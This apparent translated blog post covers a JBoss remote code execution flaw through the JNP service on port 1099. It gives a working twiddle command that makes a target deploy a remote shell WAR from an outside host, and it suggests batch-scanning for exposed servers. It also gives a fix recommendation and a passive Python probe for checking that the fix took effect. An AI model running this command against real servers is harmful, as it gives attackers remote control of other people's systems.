A few days ago Bird brother sent me an article about a Java vulnerability, something to do with port 1099 allowing remote method invocation.
That suddenly reminded me of an issue I never mentioned at XCON2012 because I had "forgotten" it: a JBoss remote code execution vulnerability. I have not seen a Chinese translation or usage guide for it. So much time has passed that I really had forgotten. Its principle is almost the same as the EJBInvoker one; the EJBInvoker issue published a few days ago is in fact an old vulnerability, and they were all released together. The part of the exploit that does the actual work is the same, only the URL differs. But no "usage guide" for this vulnerability ever appeared domestically, so many people cannot use it. The guide follows; anything not covered here, Google it.
twiddle.bat -s jnp://www.target.net:1099 invoke jboss.system:service=MainDeployer deploy http://www.inbreak.net/cmd.war
In fact this came from an article by a foreigner, lumped together with several other JBoss issues. It amounts to remotely deploying a WAR: the underlying mechanism is essentially the same as EJBInvokerServlet / JMXInvokerServlet, and the scan signature is basically the same as well, so you can batch-scan port 1099. JBoss's port 4444 does not look innocent either, but I have not had time to analyze it, so that will have to wait. I think the saddest thing about the domestic security scene is that in most cases "knowing how to use the tool == the new vulnerability", and so "exp == vulnerability details".
Fix recommendation: remove the invoker deployments (the JMXInvokerServlet / EJBInvokerServlet mentioned above), then close port 1099 so the JNP naming service is no longer reachable from untrusted networks.
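Both the batch scan of port 1099 mentioned above and the check that the fix actually took effect come down to the same probe. The script below is an added example written for this page; it is not the original post's exploit, and it is not part of JBoss or twiddle. It rests on one assumption, stated in the code: on the JBoss versions the post is about, the JNP naming service on port 1099 writes a Java-serialized java.rmi.MarshalledObject (wrapping the naming stub) to any client that connects, so a scanner only needs to connect and read. The "org.jnp" substring test is a heuristic of my own, and the sample banner bytes are constructed, not captured from a real server.

```python
"""Probe port 1099 for the JBoss JNP naming service.

Added example, not part of the original post and not a JBoss/twiddle tool.
Assumption (labelled): the JNP bootstrap service on 1099 sends a serialized
java.rmi.MarshalledObject to every connecting client.  The "org.jnp"
substring check is a heuristic assumption, not documented JBoss behaviour.
"""
import socket
import struct

SERIAL_MAGIC = b"\xac\xed\x00\x05"   # Java serialization stream header (magic + version 5)
TC_OBJECT = 0x73                     # stream type codes from the Java serialization spec
TC_CLASSDESC = 0x72


def first_class_name(data: bytes):
    """Return the class name of the first object in a Java serialization
    stream, or None if the bytes do not start with a plain TC_OBJECT."""
    if len(data) < 8 or not data.startswith(SERIAL_MAGIC):
        return None
    if data[4] != TC_OBJECT or data[5] != TC_CLASSDESC:
        return None
    (name_len,) = struct.unpack(">H", data[6:8])   # modified-UTF-8 length prefix
    name = data[8:8 + name_len]
    if len(name) != name_len:                       # truncated banner
        return None
    try:
        return name.decode("utf-8")
    except UnicodeDecodeError:
        return None


def classify_banner(data: bytes) -> str:
    """Classify whatever the remote service volunteered after connect."""
    if not data:
        return "no-banner"
    cls = first_class_name(data)
    if cls is None:
        return "not-java-serialization"
    if cls == "java.rmi.MarshalledObject" and b"org.jnp" in data:
        return "jboss-jnp"                          # assumption-based fingerprint
    return "java-serialization:" + cls


def probe(host: str, port: int = 1099, timeout: float = 3.0) -> str:
    """Connect, read up to 4 KiB, classify.  A closed or firewalled port
    (the state the fix should leave behind) reports as closed-or-filtered."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            chunks = []
            try:
                while sum(len(c) for c in chunks) < 4096:
                    chunk = s.recv(1024)
                    if not chunk:
                        break
                    chunks.append(chunk)
            except socket.timeout:
                pass                                # server went quiet; classify what we have
            return classify_banner(b"".join(chunks))
    except OSError:                                 # refused, unreachable, DNS failure, timeout
        return "closed-or-filtered"


# Constructed sample banners (not captured traffic).  The eight bytes after the
# class name stand in for the serialVersionUID; the rest is filler that only
# has to contain the substring the heuristic looks for.
SAMPLE_JNP = (SERIAL_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC])
              + struct.pack(">H", 25) + b"java.rmi.MarshalledObject"
              + b"\x00\x00\x00\x00\x00\x00\x00\x00"
              + b"...org.jnp.server.NamingServer_Stub...")
SAMPLE_HTTP = b"HTTP/1.1 400 Bad Request\r\n\r\n"

if __name__ == "__main__":
    import sys
    # usage: python probe1099.py host1 host2 ...   (assumed file name)
    for target in sys.argv[1:]:
        print(target, probe(target))
```

Run it against a list of hosts before and after applying the fix: a host that still answers "jboss-jnp" is one where the twiddle command above will still work, and a host that reports "closed-or-filtered" no longer exposes the naming service at all. The parser only reads the leading class descriptor, so it never deserializes anything the server sends.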